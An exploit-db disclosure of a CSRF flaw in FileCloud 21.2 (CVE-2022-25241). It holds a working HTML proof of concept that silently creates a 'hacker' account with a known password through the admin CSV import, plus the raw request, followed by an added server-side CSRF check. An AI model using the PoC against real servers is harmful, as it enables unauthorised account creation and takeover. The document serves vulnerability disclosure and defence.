FileCloud 21.2 – Cross-Site Request Forgery (CSRF)

  • Author: Masashi Fujiwara
    Date: 2022-02-21
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50774/

    # Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF)
    # Date: 2022-02-20
    # Exploit Author: Masashi Fujiwara
    # Vendor Homepage: https://www.filecloud.com/
    # Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2
    # Version: All versions of FileCloud prior to 21.3 (Fixed: version 21.3.0.18447)
    # Tested on:
    # OS: Ubuntu 18.04.6 LTS (Docker)
    # Apache: 2.4.52
    # FileCloud: 21.2.4.17315
    # CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation)
    
    # Conditions
    1. Only vulnerable if the cookies are issued with SameSite set to None (SameSite=None):
       echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php
    2. Use https as the target URL (when cookies are set with SameSite=None, the Secure attribute is also set).
    
    # PoC (HTML)
    <html>
    <head>
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Cache-Control" content="no-cache">
    
    <script>
    function init(){
    let myFormData = new FormData();
    let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'});
    myFormData.append("uploadFormElement", fileContent, "user.csv");
    fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", { method: "post", body: myFormData, credentials: "include"});
    }
    </script>
    </head>
    <body onload="init()">
    CSRF PoC for CVE-2022-25241
    
    Create hacker user with Password1 via CSV file upload.
    </body>
    </html>
    
    
    
    # HTTPS Request
    POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1
    Host: 192.168.159.129:8443
    Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493
    Content-Length: 365
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW
    Connection: close
    
    ------WebKitFormBoundaryiAXsUsJ2ZV54DFuW
    Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv"
    Content-Type: application/vnd.ms-excel
    
    UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
    hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES
    
    ------WebKitFormBoundaryiAXsUsJ2ZV54DFuW--
    
    
    
    # CSV file format
    UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
    hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES
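The request captured above carries the XSRF token only as a cookie, so the browser attaches it automatically to the cross-site upload. The following is an added example, not code from the exploit-db entry or from FileCloud, of a server-side admission check that would refuse that request: it assumes an `X-XSRF-TOKEN` request header as the double-submit channel and an allowed origin of `https://192.168.159.129:8443`; the cookie names and token value are taken from the captured request, and the two sample header sets are constructed.

```javascript
// Added example, not part of the exploit-db entry or of FileCloud's code.
// Cookie names come from the captured request; the X-XSRF-TOKEN request
// header and the allowed origin are assumptions made for illustration.
const ALLOWED_ORIGIN = "https://192.168.159.129:8443"; // assumed deployment origin
// Parse a "Cookie:" header value into a name -> value map.
function parseCookies(cookieHeader) {
  const jar = {};
  for (const part of (cookieHeader || "").split(";")) {
    const i = part.indexOf("=");
    if (i > 0) jar[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return jar;
}

// Admission check for a state-changing admin request such as ?op=import.
// `headers` is a map of lower-cased header names to values.
function checkCsrf(headers) {
  // 1. Fetch Metadata: a browser labels the PoC's fetch() as cross-site.
  const site = headers["sec-fetch-site"];
  if (site && site !== "same-origin" && site !== "none") {
    return { allowed: false, reason: "Sec-Fetch-Site=" + site };
  }
  // 2. Origin, when sent, must be the deployment's own origin.
  const origin = headers["origin"];
  if (origin && origin !== ALLOWED_ORIGIN) {
    return { allowed: false, reason: "origin mismatch: " + origin };
  }
  // 3. Double-submit: the XSRF token must be echoed in a custom header
  //    (which a cross-site form/fetch cannot add) and match the cookie.
  const cookieToken = parseCookies(headers["cookie"])["X-XSRF-TOKEN-admin"];
  const headerToken = headers["x-xsrf-token"];
  if (!cookieToken || !headerToken || cookieToken !== headerToken) {
    return { allowed: false, reason: "missing or mismatched XSRF token" };
  }
  return { allowed: true, reason: "ok" };
}
// Constructed sample: headers of the captured PoC request above, plus the
// Origin and Sec-Fetch-Site values a browser adds to a cross-site fetch().
const pocRequest = {
  "cookie": "X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin",
  "origin": "https://other.example",  // constructed
  "sec-fetch-site": "cross-site",     // constructed
};
// Constructed sample: the same upload issued by the admin UI itself.
const adminRequest = {
  "cookie": "X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin",
  "x-xsrf-token": "rhedxvo0gullbvzkgwwv",
  "origin": ALLOWED_ORIGIN,
  "sec-fetch-site": "same-origin",
};
```

The cookie attribute is the other half of the fix: with SameSite=Lax or Strict on the session cookies (condition 1 above), the browser never attaches them to the cross-site POST in the first place, and this check becomes defence in depth rather than the only barrier.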